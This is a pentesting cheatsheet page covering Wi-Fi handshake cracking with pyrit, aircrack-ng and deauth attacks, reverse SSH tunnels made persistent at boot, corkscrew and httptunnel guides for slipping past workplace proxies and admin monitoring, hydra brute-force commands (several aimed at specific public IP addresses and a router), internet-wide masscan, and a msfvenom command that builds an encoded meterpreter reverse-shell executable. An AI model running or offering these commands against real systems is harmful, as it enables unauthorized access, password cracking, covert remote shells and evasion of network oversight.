This is the multi-page printable view of this section. Click here to print.
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
Network security involves protecting a computer network from unauthorized access, misuse, or theft. It includes implementing measures such as firewalls, intrusion detection systems, and encryption protocols. Network security is crucial for safeguarding sensitive data and maintaining the integrity of networked systems. Regular security audits and updates are essential to counter evolving threats.
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# █████╗ ██╗██████╗ ██████╗██████╗ █████╗ ██████╗██╗ ██╗
# ██╔══██╗██║██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██╔╝
# ███████║██║██████╔╝██║ ██████╔╝███████║██║ █████╔╝
# ██╔══██║██║██╔══██╗██║ ██╔══██╗██╔══██║██║ ██╔═██╗
# ██║ ██║██║██║ ██║╚██████╗██║ ██║██║ ██║╚██████╗██║ ██╗
# ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝
#
# some comands to get an clean worlist
#----------------------------------------#
#**Remove duplicates**
awk '!(count[$0]++)' old.txt > new.txt
#**Sort by length**
awk '{print length, $0}' old.txt | sort -n | cut -d " " -f2- > new.txt
#**Sort by alphabetical order**
sort old.txt | uniq > new.txt
#**Merge multiple text files into one**
cat file1.txt file2.txt > combined.txt
#**Remove all blank lines**
egrep -v "^[[:space:]]*$" old.txt > new.txt
# pyrit
#--------#
https://www.youtube.com/watch?v=ewBSTJJppmI
# Test Capture
pyrit -r test-01.cap analyze
#Verkleinern des handshakes
pyrit -r test-01.cap -o new_handshake strip
# Zeigt leistung auf
pyrit list_cores
# Schauen was in der Datenbank ist
pyrit eval
# Passwörter in die PyritDB aufnehmen
pyrit -i tmp/dict.txt import_passwords
# SSID erstellen
pyrit -e MYSSID create_essid
#
pyrit batch
# mit DB attacken
pyrit -r new_handshake attack_db
#
pyrit --all-handshakes -r new_handshake attack_db
# db exportieren
pyrit -o pyritdb.db -e AmIRootYet export_hashdb
##coWPAtty & Genpmk Pre computed hashes
# mir Aircrack die Pyrit DB verwenden
aircrack-ng test-01.cap --r pyritdb.db
#
cowpatty -s MYSSID -r /root/output-01.cap
#
genpmk -s MYSSID -d /root/output-hash.pmk -f /root/pass.txt
#
cowpatty -s MYSSID -r /root/output-01.cap -d /root/output-hash
# airlib, airmon, airdump, aireplay-ng
#------------------------------------#
airmon-ng start wlan0
airodump-ng --channel 6 --write ouput --bssid 00:24:01:24:0A:F6 mon0
aireplay-ng --deauth 6 -a 00:24:01:21:04 -c 00:22:FA:BC:8F:1A mon0
airolib-ng crackwpa --import passwd /root/pass.txt
airolib-ng crackwpa -import essid MYSSID
airolib-ng crackwpa -import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# █████╗ ██╗██████╗ ██████╗██████╗ █████╗ ██████╗██╗ ██╗ ███╗ ██╗ ██████╗
# ██╔══██╗██║██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██╔╝ ████╗ ██║██╔════╝
# ███████║██║██████╔╝██║ ██████╔╝███████║██║ █████╔╝█████╗██╔██╗ ██║██║ ███╗
# ██╔══██║██║██╔══██╗██║ ██╔══██╗██╔══██║██║ ██╔═██╗╚════╝██║╚██╗██║██║ ██║
# ██║ ██║██║██║ ██║╚██████╗██║ ██║██║ ██║╚██████╗██║ ██╗ ██║ ╚████║╚██████╔╝
# ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝
#
# To crack WEP for a given essid name and store into a file
aircrack-ng -a 1 -e <essid> -l <output file> <.cap or .ivs file(s)>
# To crack WPA/WPA2 from airolib-ng database
aircrack-ng -e <essid> -r <database> <.cap or .ivs file(s)>
# To crack WPA/WPA2 from a wordlist
aircrack-ng -e <essid> -w <wordlist> <.cap or .ivs file(s)>
# To crack a given bssid
aircrack-ng -b <bssid> -l <output file> <.cap or .ivs file(s)>
# To crack a given bssid using FMS/Korek method
aircrack-ng -K -b <bssid> <.cap or .ivs file(s)>
# To crack a given essid (WEP) and display the ASCII of the key
aircrack-ng -e <essid> -s <.cap of .ivs file(s)>
# To crack a given essid (WEP) and create a EWSA Project
aircrack-ng -e <essid> -E <EWSA file> <.cap or .ivs file(s)>
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# █████╗ ██╗ ██╗████████╗ ██████╗ ███████╗███████╗██╗ ██╗
# ██╔══██╗██║ ██║╚══██╔══╝██╔═══██╗██╔════╝██╔════╝██║ ██║
# ███████║██║ ██║ ██║ ██║ ██║███████╗███████╗███████║
# ██╔══██║██║ ██║ ██║ ██║ ██║╚════██║╚════██║██╔══██║
# ██║ ██║╚██████╔╝ ██║ ╚██████╔╝███████║███████║██║ ██║
# ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝
# Reverse SSH Tunneling
# 2 Minuten
# Howtoforge
# Reverse SSH Tunneling
# Have you ever wanted to ssh to your Linux box that sits behind NAT? You can to that by using reverse SSH tunneling. This document will show you step by step how to set up reverse SSH tunneling. The reverse SSH tunnel should work fine with any Unix like system.
# Setup a Reverse SSH Tunnel
# Let's assume that Destination's IP is 192.168.20.55 (Linux box that you want to access).
# You want to access from Linux client with IP 138.47.99.99.
# Destination (192.168.20.55) <- |NAT| <- Source (138.47.99.99)
# 1. SSH from the destination to the source (with public IP) using the command below:
ssh -R 19999:localhost:22 [email protected]
# * port 19999 can be any unused port.
# 2. Now you can SSH from source to destination through SSH tunneling:
ssh localhost -p 19999
# 3. 3rd party servers can also access 192.168.20.55 through Destination (138.47.99.99).
# Destination (192.168.20.55) <- |NAT| <- Source (138.47.99.99) <- Bob's server
# 3.1 From Bob's server:
ssh [email protected]
# 3.2 After the successful login to Source:
ssh localhost -p 19999
# * the connection between destination and source must be alive at all time.
# Tip: you may run a command (e.g. watch, top) on Destination to keep the connection active.
# Step 1
# I recommand to use ssh option -f to detach ssh process from the tty and -N to not execute any command over ssh (the connexion is just used for port forwarding)
# Using key authentication (option -i) is quite better too and make this command to be run within a boot script (like /etc/rc.local) :
ssh -i /path/to/priv/key/id_rsa -f -N -R 19999:localhost:22 [email protected]
# Step 3
# In your example, you have to give a shell access to 138.47.99.99 to a foreign user (bob) in order to let him connect to destination.
# If bob does not need any shell access to 138.47.99.99, you can specify the remote port forwarder to listen on one specific interface or any (instead of 127.0.0.1 by default) :
ssh -i /path/to/priv/key/id_rsa -f -N -R *:19999:localhost:22 [email protected]
# But take care this last command makes the destination UNIX system being exposed to Internet via 138.47.99.99. IP filtering and/or a knockd daemon are recommanded on 138.47.99.99 if you do not want an internal server being scanned.
# Then you would d have to use another computer/server as an intermediary(aka:middleman).
# -Reverse SSH from the Target PC to the middleman:
ssh -R {PortOnMiddlePC}:localhost:{PortOnTargetPC} {UserOnMiddlePC}@{IPofMiddlePC}
ssh -R 19999:localhost:22 [email protected]
# -Now from the Client PC pull the port down from the middleman:
ssh -L {PortOnClientPC}:localhost:{PortOnMiddlePC} {UserOnMiddlePC}@{IPofMiddlePC}
ssh -L 19999:localhost:19999 [email protected]
# -Now you can ssh the Target PC from the Client PC:
ssh localhost -p {PortForwardedFromTargetPC}
ssh localhost -p 19999
# A better way is to set it up in your ~/.ssh/config file:
# Host remotehost
# Hostname remotehost.org
# User remoteuser
# HostKeyAlias remotehost
# ConnectionAttempts 3
# TCPKeepAlive no
# CheckHostIp no
# RemoteForward 20023 localhost:22
# RemoteForward 2221 lhost1:22
# RemoteForward 2222 lhost2:22
# RemoteForward 2389 lhost3:389
# RemoteForward 2390 lhost4:389
# RemoteForward 2391 lhost5:389
# RemoteForward 20080 lhost6:80
# RemoteForward 20443 lhost6:443
# LocalForward 3001 remotehost:3000
# LocalForward 8001 remotehost:8000
# ForwardAgent yes
# ForwardX11 yes
# Protocol 2
# http://www.harding.motd.ca/autossh/
# This can be combined autossh to make sure the connection is restarted if it ever dies. I run the following from my Debian's /etc/rc.local, called /etc/tunnel/tunnel.sh:
#!/bin/bash
HOSTNAME=$(hostname)
SSH_OPTIONS="-i /etc/tunnel/$HOSTNAME.key"
# Always assume initial connection will be successful
export AUTOSSH_GATETIME=0
# Disable echo service, relying on SSH exiting itself
export AUTOSSH_PORT=0
autossh -f -- $SSH_OPTIONS -o 'ControlPath none' -R 19999:localhost:22 [email protected] -fN
#-----------------------------------------------------------------------///
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ██████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ██████╗██████╗ ███████╗██╗ ██╗
# ██╔════╝██╔═══██╗██╔══██╗██║ ██╔╝██╔════╝██╔════╝██╔══██╗██╔════╝██║ ██║
# ██║ ██║ ██║██████╔╝█████╔╝ ███████╗██║ ██████╔╝█████╗ ██║ █╗ ██║
# ██║ ██║ ██║██╔══██╗██╔═██╗ ╚════██║██║ ██╔══██╗██╔══╝ ██║███╗██║
# ╚██████╗╚██████╔╝██║ ██║██║ ██╗███████║╚██████╗██║ ██║███████╗╚███╔███╔╝
# ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚══╝╚══╝
# http://ProxyUser:[email protected]:8080
# corkscrew 2.0:
corkscrew <proxyhost> <proxyport> <desthost> <destport> [authfile]
### Welcome to Corkscrew
# --------------------
### Introduction
# ------------
# Corkscrew is a tool for tunneling SSH through HTTP proxies, but ...you might find another use for it.
# Corkscrew has been compiled on :
# * HPUX
# * Solaris
# * FreeBSD
# * OpenBSD
# * Linux
# * Win32 (with Cygwin)
# Corkscrew has been tested with the following HTTP proxies :
# * Gauntlet
# * CacheFlow
# * JunkBuster
# * Apache mod_proxy
# Please email me if you get it working on other proxies or compile it elsewhere.
## Where Do I Get It?
# ------------------
# Corkscrew's primary distribution site is: http://www.agroman.net/corkscrew/
## How Do I Build It?
# ------------------
# In the corkscrew directory type './configure' then 'make'. Check out the INSTALL file for more information.
## How Do I Install It?
# --------------------
# In the corkscrew directory type 'make install'.
## How Is It Used?
# ---------------
# NOTE: Command line syntax has changed since version 1.5. Please notice that the proxy port is NOT optional anymore and is required in the command line.
# Setting up Corkscrew with SSH/OpenSSH is very simple. Adding the following line to your ~/.ssh/config file will usually do the trick (replace proxy.example.com and 8080 with correct values):
ProxyCommand /usr/local/bin/corkscrew proxy.lxu.io 8080 %h %p
## How Do I Use The HTTP Authentication Feature?
# ---------------------------------------------
# You will need to create a file that contains your usename and password in the form of :
username:password # I suggest you place this file in your ~/.ssh directory.
# After creating this file you will need to ensure that the proper perms are set so nobody else can get your username and password by reading this file. So do this :
chmod 600 myauth
# Now you will have to change the ProxyCommand line in your ~/.ssh/config file. Here's an example :
ProxyCommand /usr/local/bin/corkscrew proxy.work.com 80 %h %p ~/.ssh/myauth
# The proxy authentication feature is very new and has not been tested extensively so your mileage may vary. If you encounter any problems when trying to use this feature please email me. It would be helpful if you could include the following information :
# - Proxy version (ie. Gauntlet Proxy, Microsoft Proxy Server, etc)
# - Operating system you are trying to run corkscrew on
# - Command line syntax you are using
# - Any error messages that are visible to you
# *NOTE: I have had problems using the auth features with Mircosoft Proxyserver. The problems are sporadic, and I believe that they are related to the round-robin setup that I was testing it again. Your mileage may vary.
## Who Am I?
# ---------
# My name is Tux Tux. I'm a dork.
URL : http://www.lxu.io/
Email : [email protected]
####################################################################################
#############################
# SSH Through or Over Proxy #
#############################
# In today's cruel networked world, we're too often hampered behind (evil) company proxies that restricts how we can use the internet while at work, at a customers' place or even in some cases while at home or at friends'.
# Not only do proxies restrict what you can do, what protocols that are accepted, what sites you can visit and what TCP ports that are let through, it also allows your company or friend to log and supervise you.
# Note that even when you use HTTPS through the proxy, the server name is exposed so a logging proxy will see what HTTPS servers you connect to.
# I'll show you some easy steps that help you circumvent the boundaries of most proxy setups, and that also will bring you more freedom and prevent peeking eyes to investigate your browsing habits!
# What You Need
# You need software installed and running in a location outside of where you are. I call that place 'home' in this document. The place you want to get out from is what I call 'work' in this document. At 'work' you're behind the evil proxy.
### At Home
# You need a HTTP proxy running, and you really only need it to accept connections to proxy from localhost. Lots of people already have an Apache running and making it load the proxy module and configure it for localhost is very easy and quickly done. Of course you can opt for another proxy software, such as squid if you prefer that. In this example, we assume that the proxy runs on port 80 - the same as the typical apache install uses. You may want to enable HTTPS and FTP and other protocols in the proxy config.
# You need sshd running on port 443. Almost everyone already have sshd running already, you just need to make it also listen for connections on port 443. 443 is typically used for HTTPS and that's why we use it - most proxies are configured to allow connections to 443 since companies want to allow their employees to be able to use banks and other HTTPS web services on the net Perhaps needless to say, but you must make sure that your Apache or other httpd server doesn't use the 443 port for HTTPS.
### At Work
# picture trying to show the desrcibed scenario You need an SSH client that can issue CONNECT requests through the company HTTP proxy. If you're on Windows, using Putty is fine as it has built-in support for tunneling through a HTTP proxy. If you're on unix/linux (or cywgin) you can use openssh with corkscrew to go through the proxy to your home computer's port 443. If using openssh, you'd add the following line to your ~/.ssh/config file:
ProxyCommand /usr/local/bin/corkscrew proxy.work.com 80 %h %p
# You config the ssh client to port-forward a local port, say 8080, to the remote's localhost:80. Now you have a channel established to your home computer, over a securely encrypted connection. Of course you also get a SSH login and you can start your X-programs from home to pop up at work etc...
# The openssh command line to connect and port-foward the proxy could then look like this:
ssh -L 8080:localhost:80 [email protected] -p 443
# Configure your browser at work to use "localhost:8080" as proxy, for all the protocols you have enabled in your proxy at home. All subsequent browser requests are then sent over the SSH connection, through the proxy, to the ssh server at home and from there to your proxy, and out in the world...
### The SOCKS proxy way
# Instead of running a HTTP proxy at home to reach the internet with, you can use the tunnel as a SOCKS proxy. This basically allows you to not run anything at all at home apart from the ssh server.
# If you have openssh in both ends, you can opt to use this simpler approach. It lets you fire up the tunnel to your home machine and use that tunnel as a SOCKS proxy rather than using a HTTP one at the other end of the tunnel. This way, you don't need to run any other software at home than the ssh server itself.
# You can start up the tunnel/SOCKS proxy from the work side by issuing a command like:
ssh -D 8080 [email protected] -p 443
# You may still need the "ProxyCommand" line mentioned above to make sure your ssh client can reach your ssh server at home. Subsequently, you need to configure your work browser to use the SOCKS proxy now running at localhost port 8080.
### Without CONNECT
# For cases when CONNECT is not allowed to port 443 of your home computer, you can of course try another port - if any at all are allowed, and then you may need to move your proxy/web server from 80 if that's the only way for you.
# If you cannot find any useful port or if CONNECT is not allowed at all, you need to establish a tunnel using normal HTTP, using for example httptunnel. httptunnel is a client/server application, and you want the server ("hts") to run on your home computer, listening on port 80, and you run the client ("htc") on your work computer setting up the tunnel.
# At home, take an incoming connection on port 80 and forward it to port 22 (ssh):
hts -F localhost:22 80
# At work, connect to home over the company proxy and forward a local port (8022 in this example) to SSH to home over:
htc -P proxy.corp.com:80 -F 8022 server.at.home:80
# Additional Comments
# For other protocols you can of course just make sure that your work-ssh session forwards more ports to your home machine. It then differs between the protocols how you get them to work. If you want to IRC at work through this setup, you need a "IRC bouncer" (like muh) running on your home machine since IRC cannot work properly otherwise.
# For cases when your work doesn't actually lock you behind a proxy, you can still use this approach (although you can skip the part with doing CONNECT and your home computer doesn't have to run ssh on port 443) to prevent your work admins from snooping on your network traffic. Changelog: I added the SOCKS proxy details in June 2010.
#==============================##==============================#
# CMD corkscrew #
#==============================##==============================#
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ██████╗ ██╗ ██╗ ██████╗██████╗ ██████╗ ██╗ ██╗███╗ ███╗██████╗
# ██╔══██╗██║ ██║██╔════╝██╔══██╗██╔══██╗██║ ██║████╗ ████║██╔══██╗
# ██║ ██║███████║██║ ██████╔╝██║ ██║██║ ██║██╔████╔██║██████╔╝
# ██║ ██║██╔══██║██║ ██╔═══╝ ██║ ██║██║ ██║██║╚██╔╝██║██╔═══╝
# ██████╔╝██║ ██║╚██████╗██║ ██████╔╝╚██████╔╝██║ ╚═╝ ██║██║
# ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝
# dhcpdump is good for sniffing and displaying DHCP packets on the network
# sniff DHCP traffic on interface eth0
dhcpdump -i eth0
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ██╗ ██╗██╗ ██╗██████╗ ██████╗ █████╗
# ██║ ██║╚██╗ ██╔╝██╔══██╗██╔══██╗██╔══██╗
# ███████║ ╚████╔╝ ██║ ██║██████╔╝███████║
# ██╔══██║ ╚██╔╝ ██║ ██║██╔══██╗██╔══██║
# ██║ ██║ ██║ ██████╔╝██║ ██║██║ ██║
# ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝
#hydra does not have a native default wordlist, using the Rockyou list is suggested
#example brute force crack on ftp server
hydra -t 1 -l admin -P [path to password.lst] -vV [IPaddress] ftp
--> -t # = preform # tasks
--> -l NAME = try to log in with NAME
--> -P [filepath] = Try password
--> -vV = verbose mode, showing the login+pass for each attempt
#check for joe accounts by adding modifier -e s
#to write found login+pass combinations to fiel, add modifier -0 [fileanme]
Router von cam4
http://94.75.75.242/jsproxy
username=admin&password=&submit.htm%3Flogin.htm=Send
hydra 94.75.75.242 http-post-form "/jsproxy:username=admin&password= &submit.htm%3Flogin.htm=Send:F=login"
hydra -l admin -P /dic/r-pass.txt -t 1 -e nsr -f -vV -s 80 192.168.1.1 http-get-form "/index.cgi:client_login=^USER^&client_password=^PASS^:errorMsg"
hydra -l admin -P \wordlist.dic -t 1 -e nsr -f -vV -s 80 93.171.144.223 http-post-form "/index.cgi:name=^USER^&password=^PASS^:error"
hydra -l admin -P \wordlist.dic -t 16 -e nsr -f -vV -s 21 93.171.144.223 telnet
# FTP Server Hacking with hydra
hydra 192.168.225.100 ftp -v -v -l admin -P /password.lst -e ns -t 5 -w 30 -m / -f
hydra 192.168.225.100 ftp -v -v -L userlist.lst -P /password.lst -e ns -t 5 -w 30 -m / -f
hydra 192.168.225.100 http-get -v -v -l admin -P /password.lst -e ns -t 5 -w 30 -m / -f
# Bruteforce Synology NAS Logins with Hydra
hydra -I -V -T 5 -t 2 -s 5001 -M /tmp/syno https-post-form '/webman/login.cgi?enable_syno_token=yes:username=^USER^&passwd=^PASS^&OTPcode=:S=true' -L ./ruby-syno-brut/user -P ruby-syno-brut/passlist-short-2.txt
#==============================##==============================#
# CMD #
#==============================##==============================#
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ███╗ ███╗ █████╗ ███████╗███████╗ ██████╗ █████╗ ███╗ ██╗
# ████╗ ████║██╔══██╗██╔════╝██╔════╝██╔════╝██╔══██╗████╗ ██║
# ██╔████╔██║███████║███████╗███████╗██║ ███████║██╔██╗ ██║
# ██║╚██╔╝██║██╔══██║╚════██║╚════██║██║ ██╔══██║██║╚██╗██║
# ██║ ╚═╝ ██║██║ ██║███████║███████║╚██████╗██║ ██║██║ ╚████║
# ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═══╝
# Usage is similar to nmap. To scan a network segment for some ports
masscan -p80,8000-8100 10.0.0.0/8
# scan the entire Internet excluding exclude.txt
masscan 0.0.0.0/0 -p0-65535 --excludefile exclude.txt --max-rate 100000
# scan whole internet and specific port in humanistic time
# apt-get install git gcc make libpcap-dev git clone https://github.com/robertdavidgraham/masscan cd masscan make install -pDm755 bin/masscan /usr/bin/masscan
masscan 0.0.0.0/0 -p8080,8081,8082 --max-rate 100000 --banners --output-format grepable --output-filename /tmp/scan.xt --exclude 255.255.255.255
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ███╗ ███╗███████╗████████╗ █████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
# ████╗ ████║██╔════╝╚══██╔══╝██╔══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
# ██╔████╔██║█████╗ ██║ ███████║███████╗██████╔╝██║ ██║ ██║██║ ██║
# ██║╚██╔╝██║██╔══╝ ██║ ██╔══██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
# ██║ ╚═╝ ██║███████╗ ██║ ██║ ██║███████║██║ ███████╗╚██████╔╝██║ ██║
# ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
# To show all exploits that for a vulnerability
grep <vulnerability> show exploits
# To select an exploit to use
use <exploit>
# To see the current settings for a selected exploit
show options
# To see compatible payloads for a selected exploit
show payloads
# To set the payload for a selected exploit
set payload <payload>
# To set setting for a selected exploit
set <option> <value>
# To run the exploit
exploit
# One liner to create/generate a payload for windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/
# One liner start meterpreter
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
